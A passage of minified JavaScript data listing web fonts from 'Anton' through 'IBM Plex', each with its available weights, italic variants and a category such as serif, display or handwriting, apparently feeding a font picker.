Slab",v:[400],f:"serif"},{n:"Anton",v:[400],f:"sans-serif"},{n:"Antonio",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Anybody",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Arapey",v:[400,"400i"],f:"serif"},{n:"Arbutus",v:[400],f:"display"},{n:"Arbutus Slab",v:[400],f:"serif"},{n:"Architects Daughter",v:[400],f:"handwriting"},{n:"Archivo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Archivo Black",v:[400],f:"sans-serif"},{n:"Archivo Narrow",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Are You Serious",v:[400],f:"handwriting"},{n:"Aref Ruqaa",v:[400,700],f:"serif"},{n:"Arimo",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Arizonia",v:[400],f:"handwriting"},{n:"Armata",v:[400],f:"sans-serif"},{n:"Arsenal",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Artifika",v:[400],f:"serif"},{n:"Arvo",v:[400,"400i",700,"700i"],f:"serif"},{n:"Arya",v:[400,700],f:"sans-serif"},{n:"Asap",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Asap Condensed",v:[200,"200i",300,"300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Asar",v:[400],f:"serif"},{n:"Asset",v:[400],f:"display"},{n:"Assistant",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Astloch",v:[400,700],f:"display"},{n:"Asul",v:[400,700],f:"sans-serif"},{n:"Athiti",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Atkinson Hyperlegible",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Atma",v:["300",400,500,600,700],f:"display"},{n:"Atomic Age",v:[400],f:"display"},{n:"Aubrey",v:[400],f:"display"},{n:"Audiowide",v:[400],f:"display"},{n:"Autour One",v:[400],f:"display"},{n:"Average",v:[400],f:"serif"},{n:"Average Sans",v:[400],f:"sans-serif"},{n:"Averia Gruesa Libre",v:[400],f:"display"},{n:"Averia Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Sans Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Serif Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Azeret Mono",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Aboreto",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alkalami",v:[400],f:"serif"},{n:"Alkatra",v:[400,500,600,700],f:"display"},{n:"Alumni Sans Collegiate One",v:[400,"400i"],f:"sans-serif"},{n:"Alumni Sans Pinstripe",v:[400,"400i"],f:"sans-serif"},{n:"Amiri Quran",v:[400],f:"serif"},{n:"Anuphan",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Aoboshi One",v:[400],f:"serif"},{n:"Aref Ruqaa Ink",v:[400,700],f:"serif"},{n:"Arima",v:[100,200,300,400,500,600,700],f:"display"},{n:"B612",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"B612 Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"BIZ UDGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDMincho",v:[400,700],f:"serif"},{n:"BIZ UDPGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDPMincho",v:[400,700],f:"serif"},{n:"Babylonica",v:[400],f:"handwriting"},{n:"Bad Script",v:[400],f:"handwriting"},{n:"Bahiana",v:[400],f:"display"},{n:"Bahianita",v:[400],f:"display"},{n:"Bai Jamjuree",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Bakbak One",v:[400],f:"display"},{n:"Ballet",v:[400],f:"handwriting"},{n:"Baloo 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhai 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaijaan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaina 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Chettan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Da 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Paaji 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tamma 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tammudu 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Thambi 2",v:[400,500,600,700,800],f:"display"},{n:"Balsamiq Sans",v:[400,"400i",700,"700i"],f:"display"},{n:"Balthazar",v:[400],f:"serif"},{n:"Bangers",v:[400],f:"display"},{n:"Barlow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Semi Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barriecito",v:[400],f:"display"},{n:"Barrio",v:[400],f:"display"},{n:"Basic",v:[400],f:"sans-serif"},{n:"Baskervville",v:[400,"400i"],f:"serif"},{n:"Battambang",v:["100","300",400,700,900],f:"display"},{n:"Baumans",v:[400],f:"display"},{n:"Bayon",v:[400],f:"sans-serif"},{n:"Be Vietnam Pro",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Beau Rivage",v:[400],f:"handwriting"},{n:"Bebas Neue",v:[400],f:"sans-serif"},{n:"Belgrano",v:[400],f:"serif"},{n:"Bellefair",v:[400],f:"serif"},{n:"Belleza",v:[400],f:"sans-serif"},{n:"Bellota",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Bellota Text",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"BenchNine",v:["300",400,700],f:"sans-serif"},{n:"Benne",v:[400],f:"serif"},{n:"Bentham",v:[400],f:"serif"},{n:"Berkshire Swash",v:[400],f:"handwriting"},{n:"Besley",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Beth Ellen",v:[400],f:"handwriting"},{n:"Bevan",v:[400,"400i"],f:"display"},{n:"BhuTuka Expanded One",v:[400],f:"display"},{n:"Big Shoulders Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Bigelow Rules",v:[400],f:"display"},{n:"Bigshot One",v:[400],f:"display"},{n:"Bilbo",v:[400],f:"handwriting"},{n:"Bilbo Swash Caps",v:[400],f:"handwriting"},{n:"BioRhyme",v:["200","300",400,700,800],f:"serif"},{n:"BioRhyme Expanded",v:["200","300",400,700,800],f:"serif"},{n:"Birthstone",v:[400],f:"handwriting"},{n:"Birthstone Bounce",v:[400,500],f:"handwriting"},{n:"Biryani",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bitter",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Black And White Picture",v:[400],f:"sans-serif"},{n:"Black Han Sans",v:[400],f:"sans-serif"},{n:"Black Ops One",v:[400],f:"display"},{n:"Blinker",v:["100","200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bodoni Moda",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Bokor",v:[400],f:"display"},{n:"Bona Nova",v:[400,"400i",700],f:"serif"},{n:"Bonbon",v:[400],f:"handwriting"},{n:"Bonheur Royale",v:[400],f:"handwriting"},{n:"Boogaloo",v:[400],f:"display"},{n:"Bowlby One",v:[400],f:"display"},{n:"Bowlby One SC",v:[400],f:"display"},{n:"Brawler",v:[400,700],f:"serif"},{n:"Bree Serif",v:[400],f:"serif"},{n:"Brygada 1918",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Bubblegum Sans",v:[400],f:"display"},{n:"Bubbler One",v:[400],f:"sans-serif"},{n:"Buda",v:["300"],f:"display"},{n:"Buenard",v:[400,700],f:"serif"},{n:"Bungee",v:[400],f:"display"},{n:"Bungee Hairline",v:[400],f:"display"},{n:"Bungee Inline",v:[400],f:"display"},{n:"Bungee Outline",v:[400],f:"display"},{n:"Bungee Shade",v:[400],f:"display"},{n:"Butcherman",v:[400],f:"display"},{n:"Butterfly Kids",v:[400],f:"handwriting"},{n:"Blaka",v:[400],f:"display"},{n:"Blaka Hollow",v:[400],f:"display"},{n:"Blaka Ink",v:[400],f:"display"},{n:"Braah One",v:[400],f:"sans-serif"},{n:"Bruno Ace",v:[400],f:"display"},{n:"Bruno Ace SC",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Cabin",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cabin Condensed",v:[400,500,600,700],f:"sans-serif"},{n:"Cabin Sketch",v:[400,700],f:"display"},{n:"Caesar Dressing",v:[400],f:"display"},{n:"Cagliostro",v:[400],f:"sans-serif"},{n:"Cairo",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caladea",v:[400,"400i",700,"700i"],f:"serif"},{n:"Calistoga",v:[400],f:"display"},{n:"Calligraffitti",v:[400],f:"handwriting"},{n:"Cambay",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cambo",v:[400],f:"serif"},{n:"Candal",v:[400],f:"sans-serif"},{n:"Cantarell",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cantata One",v:[400],f:"serif"},{n:"Cantora One",v:[400],f:"sans-serif"},{n:"Capriola",v:[400],f:"sans-serif"},{n:"Caramel",v:[400],f:"handwriting"},{n:"Carattere",v:[400],f:"handwriting"},{n:"Cardo",v:[400,"400i",700],f:"serif"},{n:"Carme",v:[400],f:"sans-serif"},{n:"Carrois Gothic",v:[400],f:"sans-serif"},{n:"Carrois Gothic SC",v:[400],f:"sans-serif"},{n:"Carter One",v:[400],f:"display"},{n:"Castoro",v:[400,"400i"],f:"serif"},{n:"Catamaran",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caudex",v:[400,"400i",700,"700i"],f:"serif"},{n:"Caveat",v:[400,500,600,700],f:"handwriting"},{n:"Caveat Brush",v:[400],f:"handwriting"},{n:"Cedarville Cursive",v:[400],f:"handwriting"},{n:"Ceviche One",v:[400],f:"display"},{n:"Chakra Petch",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Changa",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Changa One",v:[400,"400i"],f:"display"},{n:"Chango",v:[400],f:"display"},{n:"Charm",v:[400,700],f:"handwriting"},{n:"Charmonman",v:[400,700],f:"handwriting"},{n:"Chathura",v:["100","300",400,700,800],f:"sans-serif"},{n:"Chau Philomene One",v:[400,"400i"],f:"sans-serif"},{n:"Chela One",v:[400],f:"display"},{n:"Chelsea Market",v:[400],f:"display"},{n:"Chenla",v:[400],f:"display"},{n:"Cherish",v:[400],f:"handwriting"},{n:"Cherry Cream Soda",v:[400],f:"display"},{n:"Cherry Swash",v:[400,700],f:"display"},{n:"Chewy",v:[400],f:"display"},{n:"Chicle",v:[400],f:"display"},{n:"Chilanka",v:[400],f:"handwriting"},{n:"Chivo",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Chonburi",v:[400],f:"display"},{n:"Cinzel",v:[400,500,600,700,800,900],f:"serif"},{n:"Cinzel Decorative",v:[400,700,900],f:"display"},{n:"Clicker Script",v:[400],f:"handwriting"},{n:"Coda",v:[400,800],f:"display"},{n:"Coda Caption",v:[800],f:"sans-serif"},{n:"Codystar",v:["300",400],f:"display"},{n:"Coiny",v:[400],f:"display"},{n:"Combo",v:[400],f:"display"},{n:"Comfortaa",v:["300",400,500,600,700],f:"display"},{n:"Comforter",v:[400],f:"handwriting"},{n:"Comforter Brush",v:[400],f:"handwriting"},{n:"Comic Neue",v:["300","300i",400,"400i",700,"700i"],f:"handwriting"},{n:"Coming Soon",v:[400],f:"handwriting"},{n:"Commissioner",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Concert One",v:[400],f:"display"},{n:"Condiment",v:[400],f:"handwriting"},{n:"Content",v:[400,700],f:"display"},{n:"Contrail One",v:[400],f:"display"},{n:"Convergence",v:[400],f:"sans-serif"},{n:"Cookie",v:[400],f:"handwriting"},{n:"Copse",v:[400],f:"serif"},{n:"Corben",v:[400,700],f:"display"},{n:"Corinthia",v:[400,700],f:"handwriting"},{n:"Cormorant",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Cormorant Garamond",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant Infant",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant SC",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Unicase",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Upright",v:["300",400,500,600,700],f:"serif"},{n:"Courgette",v:[400],f:"handwriting"},{n:"Courier Prime",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Cousine",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Coustard",v:[400,900],f:"serif"},{n:"Covered By Your Grace",v:[400],f:"handwriting"},{n:"Crafty Girls",v:[400],f:"handwriting"},{n:"Creepster",v:[400],f:"display"},{n:"Crete Round",v:[400,"400i"],f:"serif"},{n:"Crimson Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Croissant One",v:[400],f:"display"},{n:"Crushed",v:[400],f:"display"},{n:"Cuprum",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cute Font",v:[400],f:"display"},{n:"Cutive",v:[400],f:"serif"},{n:"Cutive Mono",v:[400],f:"monospace"},{n:"Cairo Play",v:[200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Carlito",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Castoro Titling",v:[400],f:"display"},{n:"Charis SIL",v:[400,"400i",700,"700i"],f:"serif"},{n:"Cherry Bomb One",v:[400],f:"display"},{n:"Chivo Mono",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Chokokutai",v:[400],f:"display"},{n:"Climate Crisis",v:[400],f:"display"},{n:"Comme",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Crimson Text",v:[400,"400i",600,"600i",700,"700i"],f:"serif"},{n:"DM Mono",v:["300","300i",400,"400i",500,"500i"],f:"monospace"},{n:"DM Sans",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"DM Serif Display",v:[400,"400i"],f:"serif"},{n:"DM Serif Text",v:[400,"400i"],f:"serif"},{n:"Damion",v:[400],f:"handwriting"},{n:"Dancing Script",v:[400,500,600,700],f:"handwriting"},{n:"Dangrek",v:[400],f:"display"},{n:"Darker Grotesque",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"David Libre",v:[400,500,700],f:"serif"},{n:"Dawning of a New Day",v:[400],f:"handwriting"},{n:"Days One",v:[400],f:"sans-serif"},{n:"Dekko",v:[400],f:"handwriting"},{n:"Dela Gothic One",v:[400],f:"display"},{n:"Delius",v:[400],f:"handwriting"},{n:"Delius Swash Caps",v:[400],f:"handwriting"},{n:"Delius Unicase",v:[400,700],f:"handwriting"},{n:"Della Respira",v:[400],f:"serif"},{n:"Denk One",v:[400],f:"sans-serif"},{n:"Devonshire",v:[400],f:"handwriting"},{n:"Dhurjati",v:[400],f:"sans-serif"},{n:"Didact Gothic",v:[400],f:"sans-serif"},{n:"Diplomata",v:[400],f:"display"},{n:"Diplomata SC",v:[400],f:"display"},{n:"Do Hyeon",v:[400],f:"sans-serif"},{n:"Dokdo",v:[400],f:"handwriting"},{n:"Domine",v:[400,500,600,700],f:"serif"},{n:"Donegal One",v:[400],f:"serif"},{n:"Dongle",v:["300",400,700],f:"sans-serif"},{n:"Doppio One",v:[400],f:"sans-serif"},{n:"Dorsa",v:[400],f:"sans-serif"},{n:"Dosis",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"DotGothic16",v:[400],f:"sans-serif"},{n:"Dr Sugiyama",v:[400],f:"handwriting"},{n:"Duru Sans",v:[400],f:"sans-serif"},{n:"Dynalight",v:[400],f:"display"},{n:"Darumadrop One",v:[400],f:"display"},{n:"Delicious Handrawn",v:[400],f:"handwriting"},{n:"DynaPuff",v:[400,500,600,700],f:"display"},{n:"Edu NSW ACT Foundation",v:[400,500,600,700],f:"handwriting"},{n:"EB Garamond",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Eagle Lake",v:[400],f:"handwriting"},{n:"East Sea Dokdo",v:[400],f:"handwriting"},{n:"Eater",v:[400],f:"display"},{n:"Economica",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Eczar",v:[400,500,600,700,800],f:"serif"},{n:"El Messiri",v:[400,500,600,700],f:"sans-serif"},{n:"Electrolize",v:[400],f:"sans-serif"},{n:"Elsie",v:[400,900],f:"display"},{n:"Elsie Swash Caps",v:[400,900],f:"display"},{n:"Emblema One",v:[400],f:"display"},{n:"Emilys Candy",v:[400],f:"display"},{n:"Encode Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans SC",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Engagement",v:[400],f:"handwriting"},{n:"Englebert",v:[400],f:"sans-serif"},{n:"Enriqueta",v:[400,500,600,700],f:"serif"},{n:"Ephesis",v:[400],f:"handwriting"},{n:"Epilogue",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Erica One",v:[400],f:"display"},{n:"Esteban",v:[400],f:"serif"},{n:"Estonia",v:[400],f:"handwriting"},{n:"Euphoria Script",v:[400],f:"handwriting"},{n:"Ewert",v:[400],f:"display"},{n:"Exo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Exo 2",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Expletus Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"display"},{n:"Explora",v:[400],f:"handwriting"},{n:"Edu QLD Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu SA Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu TAS Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu VIC WA NT Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Fahkwang",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Familjen Grotesk",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Fanwood Text",v:[400,"400i"],f:"serif"},{n:"Farro",v:["300",400,500,700],f:"sans-serif"},{n:"Farsan",v:[400],f:"display"},{n:"Fascinate",v:[400],f:"display"},{n:"Fascinate Inline",v:[400],f:"display"},{n:"Faster One",v:[400],f:"display"},{n:"Fasthand",v:[400],f:"display"},{n:"Fauna One",v:[400],f:"serif"},{n:"Faustina",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Federant",v:[400],f:"display"},{n:"Federo",v:[400],f:"sans-serif"},{n:"Felipa",v:[400],f:"handwriting"},{n:"Fenix",v:[400],f:"serif"},{n:"Festive",v:[400],f:"handwriting"},{n:"Finger Paint",v:[400],f:"display"},{n:"Fira Code",v:["300",400,500,600,700],f:"monospace"},{n:"Fira Mono",v:[400,500,700],f:"monospace"},{n:"Fira Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Extra Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fjalla One",v:[400],f:"sans-serif"},{n:"Fjord One",v:[400],f:"serif"},{n:"Flamenco",v:["300",400],f:"display"},{n:"Flavors",v:[400],f:"display"},{n:"Fleur De Leah",v:[400],f:"handwriting"},{n:"Flow Block",v:[400],f:"display"},{n:"Flow Circular",v:[400],f:"display"},{n:"Flow Rounded",v:[400],f:"display"},{n:"Fondamento",v:[400,"400i"],f:"handwriting"},{n:"Fontdiner Swanky",v:[400],f:"display"},{n:"Forum",v:[400],f:"display"},{n:"Francois One",v:[400],f:"sans-serif"},{n:"Frank Ruhl Libre",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Fraunces",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Freckle Face",v:[400],f:"display"},{n:"Fredericka the Great",v:[400],f:"display"},{n:"Fredoka",v:["300",400,500,600,700],f:"sans-serif"},{n:"Freehand",v:[400],f:"display"},{n:"Fresca",v:[400],f:"sans-serif"},{n:"Frijole",v:[400],f:"display"},{n:"Fruktur",v:[400,"400i"],f:"display"},{n:"Fugaz One",v:[400],f:"display"},{n:"Fuggles",v:[400],f:"handwriting"},{n:"Fuzzy Bubbles",v:[400,700],f:"handwriting"},{n:"Figtree",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Finlandica",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Foldit",v:[100,200,300,400,500,600,700,800,900],f:"display"},{n:"Fragment Mono",v:[400,"400i"],f:"monospace"},{n:"GFS Didot",v:[400],f:"serif"},{n:"GFS Neohellenic",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Gabriela",v:[400],f:"serif"},{n:"Gaegu",v:["300",400,700],f:"handwriting"},{n:"Gafata",v:[400],f:"sans-serif"},{n:"Galada",v:[400],f:"display"},{n:"Galdeano",v:[400],f:"sans-serif"},{n:"Galindo",v:[400],f:"display"},{n:"Gamja Flower",v:[400],f:"handwriting"},{n:"Gayathri",v:["100",400,700],f:"sans-serif"},{n:"Gelasio",v:[400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Gemunu Libre",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Genos",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geo",v:[400,"400i"],f:"sans-serif"},{n:"Georama",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geostar",v:[400],f:"display"},{n:"Geostar Fill",v:[400],f:"display"},{n:"Germania One",v:[400],f:"display"},{n:"Gideon Roman",v:[400],f:"display"},{n:"Gidugu",v:[400],f:"sans-serif"},{n:"Gilda Display",v:[400],f:"serif"},{n:"Girassol",v:[400],f:"display"},{n:"Give You Glory",v:[400],f:"handwriting"},{n:"Glass Antiqua",v:[400],f:"display"},{n:"Glegoo",v:[400,700],f:"serif"},{n:"Gloria Hallelujah",v:[400],f:"handwriting"},{n:"Glory",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Gluten",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Goblin One",v:[400],f:"display"},{n:"Gochi Hand",v:[400],f:"handwriting"},{n:"Goldman",v:[400,700],f:"display"},{n:"Gorditas",v:[400,700],f:"display"},{n:"Gothic A1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Gotu",v:[400],f:"sans-serif"},{n:"Goudy Bookletter 1911",v:[400],f:"serif"},{n:"Gowun Batang",v:[400,700],f:"serif"},{n:"Gowun Dodum",v:[400],f:"sans-serif"},{n:"Graduate",v:[400],f:"display"},{n:"Grand Hotel",v:[400],f:"handwriting"},{n:"Grandstander",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Grape Nuts",v:[400],f:"handwriting"},{n:"Gravitas One",v:[400],f:"display"},{n:"Great Vibes",v:[400],f:"handwriting"},{n:"Grechen Fuemen",v:[400],f:"handwriting"},{n:"Grenze",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Grenze Gotisch",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Grey Qo",v:[400],f:"handwriting"},{n:"Griffy",v:[400],f:"display"},{n:"Gruppo",v:[400],f:"sans-serif"},{n:"Gudea",v:[400,"400i",700],f:"sans-serif"},{n:"Gugi",v:[400],f:"display"},{n:"Gupter",v:[400,500,700],f:"serif"},{n:"Gurajada",v:[400],f:"serif"},{n:"Gwendolyn",v:[400,700],f:"handwriting"},{n:"Gajraj One",v:[400],f:"display"},{n:"Gantari",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Gloock",v:[400],f:"serif"},{n:"Golos Text",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Gulzar",v:[400],f:"serif"},{n:"Gentium Book Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Gentium Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Habibi",v:[400],f:"serif"},{n:"Hachi Maru Pop",v:[400],f:"handwriting"},{n:"Hahmlet",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Halant",v:["300",400,500,600,700],f:"serif"},{n:"Hammersmith One",v:[400],f:"sans-serif"},{n:"Hanalei",v:[400],f:"display"},{n:"Hanalei Fill",v:[400],f:"display"},{n:"Handlee",v:[400],f:"handwriting"},{n:"Hanuman",v:["100","300",400,700,900],f:"serif"},{n:"Happy Monkey",v:[400],f:"display"},{n:"Harmattan",v:[400,500,600,700],f:"sans-serif"},{n:"Headland One",v:[400],f:"serif"},{n:"Heebo",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Henny Penny",v:[400],f:"display"},{n:"Hepta Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Herr Von Muellerhoff",v:[400],f:"handwriting"},{n:"Hi Melody",v:[400],f:"handwriting"},{n:"Hina Mincho",v:[400],f:"serif"},{n:"Hind",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Guntur",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Madurai",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Siliguri",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Vadodara",v:["300",400,500,600,700],f:"sans-serif"},{n:"Holtwood One SC",v:[400],f:"serif"},{n:"Homemade Apple",v:[400],f:"handwriting"},{n:"Homenaje",v:[400],f:"sans-serif"},{n:"Hubballi",v:[400],f:"display"},{n:"Hurricane",v:[400],f:"handwriting"},{n:"Hanken Grotesk",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"IBM Plex Mono",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"monospace"},{n:"IBM Plex Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Arabic",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Devanagari",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Hebrew",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans KR",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai Looped",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex 